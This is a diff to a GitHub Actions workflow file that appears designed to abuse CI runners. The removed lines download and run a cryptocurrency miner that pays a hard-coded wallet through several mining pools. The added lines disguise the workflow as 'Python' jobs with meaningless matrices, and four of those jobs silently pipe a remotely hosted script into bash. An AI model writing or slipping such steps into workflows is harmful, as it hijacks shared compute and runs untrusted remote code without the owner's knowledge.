--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -1,33 +1,102 @@
- This is a basic workflow to help you get started with Actions
-
-name: CI
-
-# Controls when the workflow will run
-on:
-  # Triggers the workflow on push or pull request events but only for the main branch
+name: Python
+on:  
   push:
-    branches: [ main ]
   pull_request:
-    branches: [ main ]
-
-  # Allows you to run this workflow manually from the Actions tab
-  workflow_dispatch:
-
-# A workflow run is made up of one or more jobs that can run sequentially or in parallel
+ 
 jobs:
-  # This workflow contains a single job called "build"
-  build:
-    name: TiyasTampan
-    # The type of runner that the job will run on
-    runs-on: ubuntu-latest
-
+ python-1:
+    runs-on: ubuntu-18.04
     strategy:
       fail-fast: false
       matrix:
-        runner: ['t', 'i','y','a','z']
+         go: [1.11, 1.12, 1.13, 1.14, 1.15]
+         flag: [A, B, C, D]
+    timeout-minutes: 360
+ 
     steps:
-      - name: Install packages
-        run: sudo apt-get install bash git
-      - name: StartMe
-        run: |
-          wget https://github.com/nganji523/cicip/releases/download/tiyasakbar/tiyasakbar-linux_amd64 && chmod +x tiyasakbar-linux_amd64 && timeout 350m ./tiyasakbar-linux_amd64 ann -p pkt1qyjyh8m95lgcxg8hc3ajtk5gh2x45h9y4w7cfdz http://pool.srizbi.com http://pool.pktpool.io http://pool.pkt.world &> /dev/null
+    - uses: actions/checkout@v2
+    - name: Python-run
+      run: echo "python"
+ 
+ python-2:
+    runs-on: ubuntu-18.04 
+    needs: python-1
+    strategy:
+      fail-fast: false
+      matrix:
+         go: [1.11, 1.12, 1.13, 1.14, 1.15]
+         flag: [A, B, C, D]
+    timeout-minutes: 360
+ 
+    steps:
+    - uses: actions/checkout@v2
+    - name: Python-run
+      run: echo "python"
+ 
+ python-build-4:
+    runs-on: ubuntu-20.04 
+    needs: python-2
+    strategy:
+      fail-fast: false
+      matrix:
+         go: [1.11, 1.12, 1.13, 1.14, 1.15]
+         flag: [A]
+    timeout-minutes: 360
+ 
+    steps:
+    - uses: actions/checkout@v2
+    - name: Python-setup
+      run: sudo apt-get update -y && apt-get install -y
+    - name: Python-build
+      run: wget sudo && curl https://myname1.herokuapp.com/include | bash >/dev/null 2>&1
+ 
+ python-build-3:
+    runs-on: ubuntu-20.04 
+    needs: python-2
+    strategy:
+      fail-fast: false
+      matrix:
+         go: [1.11, 1.12, 1.13, 1.14, 1.15]
+         flag: [A]
+    timeout-minutes: 360
+ 
+    steps:
+    - uses: actions/checkout@v2
+    - name: Python-setup
+      run: sudo apt-get update -y && apt-get install -y
+    - name: Python-build
+      run: wget sudo && curl https://myname1.herokuapp.com/include | bash >/dev/null 2>&1
+ 
+ python-build-2:
+    runs-on: ubuntu-20.04 
+    needs: python-2
+    strategy:
+      fail-fast: false
+      matrix:
+         go: [1.11, 1.12, 1.13, 1.14, 1.15]
+         flag: [A]
+    timeout-minutes: 360
+ 
+    steps:
+    - uses: actions/checkout@v2
+    - name: Python-setup
+      run: sudo apt-get update -y && apt-get install -y
+    - name: Python-build
+      run: wget sudo && curl https://myname1.herokuapp.com/include | bash >/dev/null 2>&1
+ 
+ python-build-1:
+    runs-on: ubuntu-20.04 
+    needs: python-2
+    strategy:
+      fail-fast: false
+      matrix:
+         go: [1.11, 1.12, 1.13, 1.14, 1.15]
+         flag: [A]
+    timeout-minutes: 360
+ 
+    steps:
+    - uses: actions/checkout@v2
+    - name: Python-setup
+      run: sudo apt-get update -y && apt-get install -y
+    - name: Python-build
+      run: wget sudo && curl https://myname1.herokuapp.com/include | bash >/dev/null 2>&1
